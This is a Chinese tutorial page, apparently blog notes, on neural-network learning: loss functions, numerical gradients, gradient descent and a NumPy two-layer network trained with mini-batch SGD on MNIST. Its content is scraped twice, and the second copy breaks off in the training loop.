    numerical_gradient(function_2, np.array([0.0, 2.0]))
    array([0., 4.])
    numerical_gradient(function_2, np.array([3.0, 0.0]))
    array([6., 0.])

    No artists with labels found to put in legend.  Note that artists whose label start with an underscore are ignored when legend() is called with no argument.

    png

    梯度会指向各点处的函数值降低的方向。更严格地讲,梯度指示的方向是各点处的函数值减小最多的方向。

    4.4.1 梯度法

    通过巧妙地使用梯度来寻找函数最小值(或者尽可能小的值)的方法就是梯度法。

    函数的极小值最小值以及被称为**鞍点(saddle point)**的地方,梯度为 0。

    根据目的是寻找最小值还是最大值,梯度法的叫法有所不同。

    • 寻找最小值的梯度法称为梯度下降法(gradient descent method)

    • 寻找最大值的梯度法称为梯度上升法(gradient ascent method)

    一般来说,神经网络(深度学习)中,梯度法主要是指梯度下降法。

    $$x_0=x_0-\eta\frac{\partial f}{\partial x_0} \ x_1=x_1-\eta\frac{\partial f}{\partial x_1}$$

    $\eta$ 表示更新量,在神经网络的学习中,称为学习率(learning rate)。学习率决定在一次学习中,应该学习多少,以及在多大程度上更新参数。

    def gradient_descent(f, init_x, lr=0.01, step_num=100):
    """
    参数 f 是要进行最优化的函数
    init_x 是初始值
    lr 是学习率 learning rate
    step_num 是梯度法的重复次数
    numerical_gradient(f,x) 会求函数的梯度,用该梯度乘以学习率得到的值进行更新操作,由 step_num 指定重复的次数
    """
    x = init_x

    for i in range(step_num):
    grad = numerical_gradient(f, x)
    x -= lr * grad
    return x

    请用梯度法求 $f(x_0+x_1)=x2_0+x2_1$ 的最小值:

    def function_2(x):
    return x[0] ** 2 + x[1] ** 2
    init_x = np.array([-3.0, 4.0])
    gradient_descent(function_2, init_x=init_x, lr=0.1, step_num=100)
    array([-6.11110793e-10,  8.14814391e-10])

    学习率过大,会发散成一个很大的值:

    # 学习率过大的例子:lr=10.0
    init_x = np.array([-3.0, 4.0])
    gradient_descent(function_2, init_x=init_x, lr=10.0, step_num=100)
    array([-2.58983747e+13, -1.29524862e+12])

    学习率过小,基本没怎么更新就结束了:

    # 学习率过小的例子:lr=1e-10
    init_x = np.array([-3.0, 4.0])
    gradient_descent(function_2, init_x=init_x, lr=1e-10, step_num=100)
    array([-2.99999994,  3.99999992])

    像学习率这样的参数称为超参数。这是一种和神经网络的参数(权重和偏置)性质不同的参数。相对于神经网络的权重参数是通过训练数据和学习算法自动获得的,学习率这样的超参数则是人工设定的。

    4.4.2 神经网络的梯度

    有一个只有一个形状为 $2\times3$ 的权重 $\mathbf W$ 的神经网络,损失函数用 $L$ 表示。此时,梯度可以用 $\frac{\partial L}{\partial \mathbf W} $ 表示。

    $$\mathbf W = \begin{pmatrix} w_{11} & w_{12} & w_{13}\ w_{21} & w_{22} & w_{23} \end{pmatrix}$$

    $$\frac{\partial L}{\partial \mathbf W} = \begin{pmatrix}\frac{\partial L}{\partial w_{11}} & \frac{\partial L}{\partial w_{12}} & \frac{\partial L}{\partial w_{13}}\ \frac{\partial L}{\partial w_{21}} & \frac{\partial L}{\partial w_{22}} & \frac{\partial L}{\partial w_{23}}\end{pmatrix}$$

    以一个简单的神经网络为例,来实现求梯度:

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from common.functions import softmax, cross_entropy_error
    from common.gradient import numerical_gradient

    class simpleNet:
    def __init__(self):
    # 用高斯分布进行初始化 randn 函数返回一个或一组样本,具有标准正态分布,大小为 2x3
    self.W = np.random.randn(2, 3)

    def predict(self, x):
    return np.dot(x, self.W)

    def loss(self, x, t):
    z = self.predict(x)
    y = softmax(z)
    loss = cross_entropy_error(y, t)
    return loss
    net = simpleNet()
    print(net.W) # 权重参数
    [[ 0.10279342  0.41541928 -0.05036625] [-1.08414222  0.75288578  0.93188472]]
    x = np.array([0.6, 0.9])
    p = net.predict(x)
    print(p)
    [-0.91405194  0.92684877  0.8084765 ]
    np.argmax(p)  # 最大值的索引
    1
    t = np.array([0, 0, 1])  # 正确的解的标签
    net.loss(x, t)
    0.834766753254781
    def f(W):
    """
    这里定义的函数 f(W)的参数 W 是一个伪参数。
    因为 numerical_gradient(f, x)会在内部执行 f(x), 为了与之兼容而定义了 f(W)
    """
    return net.loss(x, t)

    或用 lambda 表示法:

    f = lambda w: net.loss(x, t)
    dW = numerical_gradient(f, net.W)
    print(dW)
    [[ 0.04650845  0.29310612 -0.33961457] [ 0.06976267  0.43965918 -0.50942185]]

    4.5 学习算法的实现

    • 前提

      • 神经网络存在合适的权重和偏置,调整权重和偏置以便拟合训练数据的过程称为“学习”。神经网络的学习分成下面 4 个步骤。
    • 步骤 1(mini-batch)

      • 从训练数据中随机选出一部分数据,这部分数据称为 mini-batch。我们的目标是减小 mini-batch 的损失函数的值。
    • 步骤 2(计算梯度)

      • 为了减小 mini-batch 的损失函数的值,需要求出各个权重参数的梯度。梯度表示损失函数的值减小最多的方向。
    • 步骤 3(更新参数)

      • 将权重参数沿梯度方向进行微小更新。
    • 步骤 4(重复)

      • 重复步骤 1、步骤 2、步骤 3。

    因为这里使用的数据是随机选择的 mini batch 数据,所以又称为随机梯度下降法(stochastic gradient descent)。“随机”指的是“随机选择的”的意思,因此,随机梯度下降法是“对随机选择的数据进行的梯度下降法”。深度学习的很多框架中,随机梯度下降法一般由一个名为 SGD 的函数来实现。

    4.5.1 2 层神经网络的类

    import sys, os
    sys.path.append(os.pardir)
    from common.functions import *
    from common.gradient import numerical_gradient

    class TwoLayerNet:


    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
    """
    初始化权重
    params 保存神经网络的参数的字典型变量(实例变量)。
    input_size: 输入层的神经元数
    hidden_size: 隐藏层的神经元数
    output_size: 输出层的神经元数
    """
    self.params = {}
    self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
    self.params['b1'] = np.zeros(hidden_size)
    self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
    self.params['b2'] = np.zeros(output_size)


    def predict(self, x):
    """
    进行推理,x 是图像数据
    """
    W1, W2 = self.params['W1'], self.params['W2']
    b1, b2 = self.params['b1'], self.params['b2']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    y = softmax(a2)
    return y


    # x:输入数据, t:监督数据
    def loss(self, x, t):
    """
    损失函数:交叉熵损失函数
    """
    y = self.predict(x)

    return cross_entropy_error(y, t)


    def accuracy(self, x, t):
    """
    计算识别精度
    """
    y = self.predict(x)
    y = np.argmax(y, axis=1)
    t = np.argmax(t, axis=1)
    accuracy = np.sum(y == t) / float(x.shape[0])
    return accuracy


    # x:输入数据, t:监督数据
    def numerical_gradient(self, x, t):
    """
    计算权重参数的梯度(数值微分法)
    grads 保存梯度的字典型变量(numerical_gradient()方法的返回值)。
    """
    loss_W = lambda W: self.loss(x, t)
    grads = {}
    grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
    grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
    grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
    grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
    return grads


    def gradient(self, x, t):
    """
    计算权重参数的梯度(反向传播法)
    grads 保存梯度的字典型变量(numerical_gradient()方法的返回值)。
    """
    W1, W2 = self.params['W1'], self.params['W2']
    b1, b2 = self.params['b1'], self.params['b2']
    grads = {}

    batch_num = x.shape[0]

    # forward
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    y = softmax(a2)

    # backward
    dy = (y - t) / batch_num
    grads['W2'] = np.dot(z1.T, dy)
    grads['b2'] = np.sum(dy, axis=0)

    da1 = np.dot(dy, W2.T)
    dz1 = sigmoid_grad(a1) * da1
    grads['W1'] = np.dot(x.T, dz1)
    grads['b1'] = np.sum(dz1, axis=0)

    return grads
    net = TwoLayerNet(input_size=784, hidden_size=100, output_size=10)
    print(net.params['W1'].shape) # (784, 100)
    print(net.params['b1'].shape) # (100,)
    print(net.params['W2'].shape) # (100, 10)
    print(net.params['b2'].shape) # (10,)
    (784, 100)(100,)(100, 10)(10,)

    4.5.2mini-batch 的实现

    import sys, os
    sys.path.append(os.pardir) # 为了导入父目录的文件而进行的设定
    import numpy as np
    import matplotlib.pyplot as plt
    from dataset.mnist import load_mnist

    # 读入数据
    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)

    network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

    iters_num = 10000 # 适当设定循环的次数
    train_size = x_train.shape[0]
    batch_size = 100 # mini-batch 大小
    learning_rate = 0.1 # 学习率

    train_loss_list = []
    train_acc_list = []
    # 平均每个 epoch 的重复次数
    test_acc_list = []

    iter_per_epoch = max(train_size / batch_size, 1)

    for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]

    # 计算梯度
    # grad = network.numerical_gradient(x_batch, t_batch) 数值微分
    grad = network.gradient(x_batch, t_batch) # 高速版!反向传播

    # 更新参数
    for key in ('W1', 'b1', 'W2', 'b2'):
    network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)

    if i % iter_per_epoch == 0:
    # 计算每个 epoch 的识别精度
    train_acc = network.accuracy(x_train, t_train)
    test_acc = network.accuracy(x_test, t_test)
    train_acc_list.append(train_acc)
    test_acc_list.append(test_acc)
    print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))

    # 绘制图形
    markers = {'train': 'o', 'test': 's'}
    x = np.arange(len(train_acc_list))
    plt.plot(x, train_acc_list, label='train acc')
    plt.plot(x, test_acc_list, label='test acc', linestyle='--')
    plt.xlabel("epochs")
    plt.ylabel("accuracy")
    plt.ylim(0, 1.0)
    plt.legend(loc='lower right')
    plt.show()
    train acc, test acc | 0.09863333333333334, 0.0958train acc, test acc | 0.7874166666666667, 0.7928train acc, test acc | 0.8762, 0.879train acc, test acc | 0.8973, 0.8996train acc, test acc | 0.9079166666666667, 0.9098train acc, test acc | 0.9134333333333333, 0.9155train acc, test acc | 0.9188, 0.9212train acc, test acc | 0.9224166666666667, 0.9248train acc, test acc | 0.9256333333333333, 0.9262train acc, test acc | 0.92945, 0.9321train acc, test acc | 0.9319666666666667, 0.9351train acc, test acc | 0.9360833333333334, 0.9372train acc, test acc | 0.93865, 0.939train acc, test acc | 0.9405, 0.9401train acc, test acc | 0.94285, 0.9412train acc, test acc | 0.9446333333333333, 0.943train acc, test acc | 0.9458166666666666, 0.9437

    png

    随着 epoch 的前进(学习的进行),我们发现使用训练数据和测试数据评价的识别精度都提高了,并且,这两个识别精度基本上没有差异(两条线基本重叠在一起)。因此,可以说这次的学习中没有发生过拟合的现象。

    4.6 小结

    • 机器学习中使用的数据集分为训练数据和测试数据。

    • 神经网络用训练数据进行学习,并用测试数据评价学习到的模型的泛化能力。

    • 神经网络的学习以损失函数为指标,更新权重参数,以使损失函数的值减小。

    • 利用某个给定的微小值的差分求导数的过程,称为数值微分。

    • 利用数值微分,可以计算权重参数的梯度。

    • 数值微分虽然费时间,但是实现起来很简单。下一章中要实现的稍微复杂一些的误差反向传播法可以高速地计算梯度。

    ]]>
    + 正文

    4.1 从数据中学习

    4.1.1 数据驱动

    深度学习有时也称为端到端机器学习(end-to-end machine learning)。这里所说的端到端是指从一端到另一端的意思,也就是从原始数据(输入)中获得目标结果(输出)的意思。

    4.1.2 训练数据和测试数据

    机器学习中,一般将数据分为训练数据(也可称为监督数据)测试数据两部分来进行学习和实验等。

    • 首先,使用训练数据进行学习,寻找最优的参数

    • 然后,使用测试数据评价训练得到的模型的实际能力

    4.2 损失函数

    神经网络的学习中所用的指标称为损失函数(loss function)。这个损失函数可以使用任意函数,但一般用均方误差和交叉熵误差等。

    4.2.1 均方误差

    $$E=\frac{1}{2}\sum_k(y_k-t_k)^2$$

    $y_k$ 表示神经网络的输出,$t_k$ 表示监督数据,$k$ 表示数据的维数。

    1
    2
    def mean_squared_error(y, t):
    return 0.5 * np.sum((y - t) ** 2)
    1
    2
    # 设“2”为正确解
    t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
    1
    2
    3
    # 例 1:“2”的概率最高的情况(0.6)
    y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
    mean_squared_error(np.array(y), np.array(t))
    0.09750000000000003
    1
    2
    3
    # 例 2:“7”的概率最高的情况(0.6)
    y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
    mean_squared_error(np.array(y), np.array(t))
    0.5975

    均方误差显示第一个例子的输出结果与监督数据更加吻合。

    4.2.2 交叉熵误差

    $$E=-\sum_kt_k\log y_k$$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    def cross_entropy_error(y, t):
    """
    参数 y 和 t 是 NumPy 数组。函数内部在计算 np.log 时,加上了一
    个微小值 delta。这是因为,当出现 np.log(0)时,np.log(0)会变为负无限大
    的-inf,这样一来就会导致后续计算无法进行。作为保护性对策,添加一个
    微小值可以防止负无限大的发生。
    """
    delta = 1e-7
    return -np.sum(t * np.log(y + delta))
    1
    2
    3
    t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
    y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
    cross_entropy_error(np.array(y), np.array(t))
    0.510825457099338
    1
    2
    y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
    cross_entropy_error(np.array(y), np.array(t))
    2.302584092994546

    4.2.3mini-batch 学习

    $$E=-\frac{1}{N}\sum_n\sum_kt_{nk}\log y_{nk}$$

    • 假设数据有 $N$ 个

    • $t_{nk}$ 表示第 $n$ 个数据的第 $k$ 个元素的值
      -($y_{nk}$ 是神经网络的输出,$t_{nk}$ 是监督数据)。

    从全部数据中选出一部分,作为全部数据的“近似”。神经网络的学习也是从训练数据中选出一批数据(称为 mini-batch, 小批量),然后对每个 mini-batch 进行学习。这种学习方式称为 mini-batch 学习

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist

    # 通过设定参数 one_hot_label=True,
    # 可以得到 one-hot 表示(即仅正确解标签为 1,其余为 0 的数据结构)。
    (x_train, t_train), (x_test, t_test) = \
    load_mnist(normalize=True, one_hot_label=True)
    print(x_train.shape) # (60000, 784) 训练数据有 60000 个,输入数据是 784 维(28 × 28)的图像数据
    print(t_train.shape) # (60000, 10) 监督数据是 10 维的数据
    (60000, 784)(60000, 10)

    从这个训练数据中随机抽取 10 笔数据。

    1
    2
    3
    4
    5
    train_size = x_train.shape[0]
    batch_size = 10
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]

    使用 np.random.choice() 可以从指定的数字中随机选择想要的数字。

    比如,np.random.choice(60000, 10) 会从 0 到 59999 之间随机选择 10 个数字

    1
    np.random.choice(60000, 10)
    array([30142, 18947,  8349, 38135,  8519, 25729, 36061, 11248, 12602,       31498])

    4.2.4mini-batch 版交叉熵误差的实现

    监督数据 $t$ 是独热编码的形式时:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    def cross_entropy_error(y, t):
    if y.ndim == 1:
    # y 的维度为 1 时,即求单个数据的交叉熵误差时,需要改变数据的形状
    t = t.reshape(1, t.size)
    y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # 当输入为 mini-batch 时,要用 batch 的个数进行正规化,计算单个数据的平均交叉熵误差
    return -np.sum(t * np.log(y + 1e-7)) / batch_size

    当监督数据是标签形式(非 one-hot 表示,而是像“2”“7”这样的标签)时:

    1
    2
    3
    4
    5
    6
    7
    8
    def cross_entropy_error(y, t):
    if y.ndim == 1:
    t = t.reshape(1, t.size)
    y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # y[np.arange(batch_size), t]能抽出各个数据的正确解标签对应的神经网络的输出
    return -np.sum(np.log(y[np.arange(batch_size), t] + 1e-7)) / batch_size

    4.2.5 为何要设定损失函数

    在进行神经网络的学习时,不能将识别精度作为指标。因为如果以识别精度为指标,则参数的导数在绝大多数地方都会变为 0(识别精度是离散的,对微小的参数变化基本上没有什么反应,即便有反应,它的值也是不连续地、突然地变化)。

    4.3 数值微分

    4.3.1 导数

    导数定义式:

    $$\frac{\mathrm df(x)}{\mathrm dx}=\lim_{h\to 0}\frac{f(x+h)-f(x)}{h}$$

    不好的实现示例:

    1
    2
    3
    def numerical_diff(f, x):
    h = 10e-50
    return (f(x+h) - f(x)) / h
    • $h$ 的值太小,会产生舍入误差

    • (x + h) 和 x 之间的差分称为前向差分,为了减小误差,可以改成中心差分

    $$\frac{\mathrm d f(x)}{\mathrm x}=\lim_{h\to 0}\frac{f(x+h)-f(x-h)}{2h}$$

    1
    2
    3
    def numerical_diff(f, x):
    h = 1e-4 # 0.0001
    return (f(x + h) - f(x - h)) / (2 * h)

    4.3.2 数值微分的例子

    对 $y=0.01x^2+0.1x$ 求微分:

    1
    2
    def function_1(x):
    return 0.01 * x ** 2 + 0.1 * x
    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np
    import matplotlib.pylab as plt

    x = np.arange(0.0, 20.0, 0.1) # 以 0.1 为单位,从 0 到 20 的数组 x
    y = function_1(x)
    plt.xlabel("x")
    plt.ylabel("f(x)")
    plt.plot(x, y)
    plt.show()

    png

    1
    numerical_diff(function_1, 5)
    0.1999999999990898
    1
    numerical_diff(function_1, 10)
    0.2999999999986347

    4.3.3 偏导数

    对于函数 $f(x_0,x_1)=x2_0+x2_1$:

    1
    2
    def function_2(x):
    return x[0] ** 2 + x[1] ** 2 # 或者 return np.sum(x ** 2)

    当 $x_0=3,x_1=4$ 时,关于 $x_0$ 的偏导数 $\frac{\partial f}{\partial x_0} $:

    1
    2
    3
    4
    def function_tmp1(x0):
    return x0*x0 + 4.0**2.0

    numerical_diff(function_tmp1, 3.0)
    6.00000000000378

    当 $x_0=3,x_1=4$ 时,关于 $x_1$ 的偏导数 $\frac{\partial f}{\partial x_1} $:

    1
    2
    3
    4
    def function_tmp2(x1):
    return 3.0 ** 2.0 + x1 * x1

    numerical_diff(function_tmp2, 4.0)
    7.999999999999119

    4.4 梯度

    像 $\left(\frac{\partial f}{\partial x_0},\frac{\partial f}{\partial x_1}\right)$ 这样的由全部变量的偏导数汇总而成的向量称为梯度(gradient)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    def numerical_gradient(f, x):
    h = 1e-4 # 0.0001
    grad = np.zeros_like(x) # 生成和 x 形状相同的数组
    for idx in range(x.size):
    tmp_val = x[idx]

    # f(x+h)的计算
    x[idx] = tmp_val + h
    fxh1 = f(x)

    # f(x-h)的计算
    x[idx] = tmp_val - h
    fxh2 = f(x)

    grad[idx] = (fxh1 - fxh2) / (2 * h)
    x[idx] = tmp_val # 还原值

    return grad

    求点 $(3,4)$、$(0,2)$、$(3,0)$ 处的梯度:

    1
    numerical_gradient(function_2, np.array([3.0, 4.0]))
    array([6., 8.])
    1
    numerical_gradient(function_2, np.array([0.0, 2.0]))
    array([0., 4.])
    1
    numerical_gradient(function_2, np.array([3.0, 0.0]))
    array([6., 0.])
    1

    No artists with labels found to put in legend.  Note that artists whose label start with an underscore are ignored when legend() is called with no argument.

    png

    梯度会指向各点处的函数值降低的方向。更严格地讲,梯度指示的方向是各点处的函数值减小最多的方向。

    4.4.1 梯度法

    通过巧妙地使用梯度来寻找函数最小值(或者尽可能小的值)的方法就是梯度法。

    函数的极小值最小值以及被称为**鞍点(saddle point)**的地方,梯度为 0。

    根据目的是寻找最小值还是最大值,梯度法的叫法有所不同。

    • 寻找最小值的梯度法称为梯度下降法(gradient descent method)

    • 寻找最大值的梯度法称为梯度上升法(gradient ascent method)

    一般来说,神经网络(深度学习)中,梯度法主要是指梯度下降法。

    $$x_0=x_0-\eta\frac{\partial f}{\partial x_0} \ x_1=x_1-\eta\frac{\partial f}{\partial x_1}$$

    $\eta$ 表示更新量,在神经网络的学习中,称为学习率(learning rate)。学习率决定在一次学习中,应该学习多少,以及在多大程度上更新参数。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    def gradient_descent(f, init_x, lr=0.01, step_num=100):
    """
    参数 f 是要进行最优化的函数
    init_x 是初始值
    lr 是学习率 learning rate
    step_num 是梯度法的重复次数
    numerical_gradient(f,x) 会求函数的梯度,用该梯度乘以学习率得到的值进行更新操作,由 step_num 指定重复的次数
    """
    x = init_x

    for i in range(step_num):
    grad = numerical_gradient(f, x)
    x -= lr * grad
    return x

    请用梯度法求 $f(x_0+x_1)=x2_0+x2_1$ 的最小值:

    1
    2
    def function_2(x):
    return x[0] ** 2 + x[1] ** 2
    1
    2
    init_x = np.array([-3.0, 4.0])
    gradient_descent(function_2, init_x=init_x, lr=0.1, step_num=100)
    array([-6.11110793e-10,  8.14814391e-10])

    学习率过大,会发散成一个很大的值:

    1
    2
    3
    # 学习率过大的例子:lr=10.0
    init_x = np.array([-3.0, 4.0])
    gradient_descent(function_2, init_x=init_x, lr=10.0, step_num=100)
    array([-2.58983747e+13, -1.29524862e+12])

    学习率过小,基本没怎么更新就结束了:

    1
    2
    3
    # 学习率过小的例子:lr=1e-10
    init_x = np.array([-3.0, 4.0])
    gradient_descent(function_2, init_x=init_x, lr=1e-10, step_num=100)
    array([-2.99999994,  3.99999992])

    像学习率这样的参数称为超参数。这是一种和神经网络的参数(权重和偏置)性质不同的参数。相对于神经网络的权重参数是通过训练数据和学习算法自动获得的,学习率这样的超参数则是人工设定的。

    4.4.2 神经网络的梯度

    有一个只有一个形状为 $2\times3$ 的权重 $\mathbf W$ 的神经网络,损失函数用 $L$ 表示。此时,梯度可以用 $\frac{\partial L}{\partial \mathbf W} $ 表示。

    $$\mathbf W = \begin{pmatrix} w_{11} & w_{12} & w_{13}\ w_{21} & w_{22} & w_{23} \end{pmatrix}$$

    $$\frac{\partial L}{\partial \mathbf W} = \begin{pmatrix}\frac{\partial L}{\partial w_{11}} & \frac{\partial L}{\partial w_{12}} & \frac{\partial L}{\partial w_{13}}\ \frac{\partial L}{\partial w_{21}} & \frac{\partial L}{\partial w_{22}} & \frac{\partial L}{\partial w_{23}}\end{pmatrix}$$

    以一个简单的神经网络为例,来实现求梯度:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from common.functions import softmax, cross_entropy_error
    from common.gradient import numerical_gradient

    class simpleNet:
    def __init__(self):
    # 用高斯分布进行初始化 randn 函数返回一个或一组样本,具有标准正态分布,大小为 2x3
    self.W = np.random.randn(2, 3)

    def predict(self, x):
    return np.dot(x, self.W)

    def loss(self, x, t):
    z = self.predict(x)
    y = softmax(z)
    loss = cross_entropy_error(y, t)
    return loss
    1
    2
    net = simpleNet()
    print(net.W) # 权重参数
    [[ 0.10279342  0.41541928 -0.05036625] [-1.08414222  0.75288578  0.93188472]]
    1
    2
    3
    x = np.array([0.6, 0.9])
    p = net.predict(x)
    print(p)
    [-0.91405194  0.92684877  0.8084765 ]
    1
    np.argmax(p)  # 最大值的索引
    1
    1
    2
    t = np.array([0, 0, 1])  # 正确的解的标签
    net.loss(x, t)
    0.834766753254781
    1
    2
    3
    4
    5
    6
    def f(W):
    """
    这里定义的函数 f(W)的参数 W 是一个伪参数。
    因为 numerical_gradient(f, x)会在内部执行 f(x), 为了与之兼容而定义了 f(W)
    """
    return net.loss(x, t)

    或用 lambda 表示法:

    1
    f = lambda w: net.loss(x, t)
    1
    2
    dW = numerical_gradient(f, net.W)
    print(dW)
    [[ 0.04650845  0.29310612 -0.33961457] [ 0.06976267  0.43965918 -0.50942185]]

    4.5 学习算法的实现

    • 前提

      • 神经网络存在合适的权重和偏置,调整权重和偏置以便拟合训练数据的过程称为“学习”。神经网络的学习分成下面 4 个步骤。
    • 步骤 1(mini-batch)

      • 从训练数据中随机选出一部分数据,这部分数据称为 mini-batch。我们的目标是减小 mini-batch 的损失函数的值。
    • 步骤 2(计算梯度)

      • 为了减小 mini-batch 的损失函数的值,需要求出各个权重参数的梯度。梯度表示损失函数的值减小最多的方向。
    • 步骤 3(更新参数)

      • 将权重参数沿梯度方向进行微小更新。
    • 步骤 4(重复)

      • 重复步骤 1、步骤 2、步骤 3。

    因为这里使用的数据是随机选择的 mini batch 数据,所以又称为随机梯度下降法(stochastic gradient descent)。“随机”指的是“随机选择的”的意思,因此,随机梯度下降法是“对随机选择的数据进行的梯度下降法”。深度学习的很多框架中,随机梯度下降法一般由一个名为 SGD 的函数来实现。

    4.5.1 2 层神经网络的类

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    import sys, os
    sys.path.append(os.pardir)
    from common.functions import *
    from common.gradient import numerical_gradient

    class TwoLayerNet:


    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
    """
    初始化权重
    params 保存神经网络的参数的字典型变量(实例变量)。
    input_size: 输入层的神经元数
    hidden_size: 隐藏层的神经元数
    output_size: 输出层的神经元数
    """
    self.params = {}
    self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
    self.params['b1'] = np.zeros(hidden_size)
    self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
    self.params['b2'] = np.zeros(output_size)


    def predict(self, x):
    """
    进行推理,x 是图像数据
    """
    W1, W2 = self.params['W1'], self.params['W2']
    b1, b2 = self.params['b1'], self.params['b2']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    y = softmax(a2)
    return y


    # x:输入数据, t:监督数据
    def loss(self, x, t):
    """
    损失函数:交叉熵损失函数
    """
    y = self.predict(x)

    return cross_entropy_error(y, t)


    def accuracy(self, x, t):
    """
    计算识别精度
    """
    y = self.predict(x)
    y = np.argmax(y, axis=1)
    t = np.argmax(t, axis=1)
    accuracy = np.sum(y == t) / float(x.shape[0])
    return accuracy


    # x:输入数据, t:监督数据
    def numerical_gradient(self, x, t):
    """
    计算权重参数的梯度(数值微分法)
    grads 保存梯度的字典型变量(numerical_gradient()方法的返回值)。
    """
    loss_W = lambda W: self.loss(x, t)
    grads = {}
    grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
    grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
    grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
    grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
    return grads


    def gradient(self, x, t):
    """
    计算权重参数的梯度(反向传播法)
    grads 保存梯度的字典型变量(numerical_gradient()方法的返回值)。
    """
    W1, W2 = self.params['W1'], self.params['W2']
    b1, b2 = self.params['b1'], self.params['b2']
    grads = {}

    batch_num = x.shape[0]

    # forward
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    y = softmax(a2)

    # backward
    dy = (y - t) / batch_num
    grads['W2'] = np.dot(z1.T, dy)
    grads['b2'] = np.sum(dy, axis=0)

    da1 = np.dot(dy, W2.T)
    dz1 = sigmoid_grad(a1) * da1
    grads['W1'] = np.dot(x.T, dz1)
    grads['b1'] = np.sum(dz1, axis=0)

    return grads
    1
    2
    3
    4
    5
    net = TwoLayerNet(input_size=784, hidden_size=100, output_size=10)
    print(net.params['W1'].shape) # (784, 100)
    print(net.params['b1'].shape) # (100,)
    print(net.params['W2'].shape) # (100, 10)
    print(net.params['b2'].shape) # (10,)
    (784, 100)(100,)(100, 10)(10,)

    4.5.2mini-batch 的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    import sys, os
    sys.path.append(os.pardir) # 为了导入父目录的文件而进行的设定
    import numpy as np
    import matplotlib.pyplot as plt
    from dataset.mnist import load_mnist

    # 读入数据
    (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)

    network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

    iters_num = 10000 # 适当设定循环的次数
    train_size = x_train.shape[0]
    batch_size = 100 # mini-batch 大小
    learning_rate = 0.1 # 学习率

    train_loss_list = []
    train_acc_list = []
    # 平均每个 epoch 的重复次数
    test_acc_list = []

    iter_per_epoch = max(train_size / batch_size, 1)

    for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]

    # 计算梯度
    # grad = network.numerical_gradient(x_batch, t_batch) 数值微分
    grad = network.gradient(x_batch, t_batch) # 高速版!反向传播

    # 更新参数
    for key in ('W1', 'b1', 'W2', 'b2'):
    network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)

    if i % iter_per_epoch == 0:
    # 计算每个 epoch 的识别精度
    train_acc = network.accuracy(x_train, t_train)
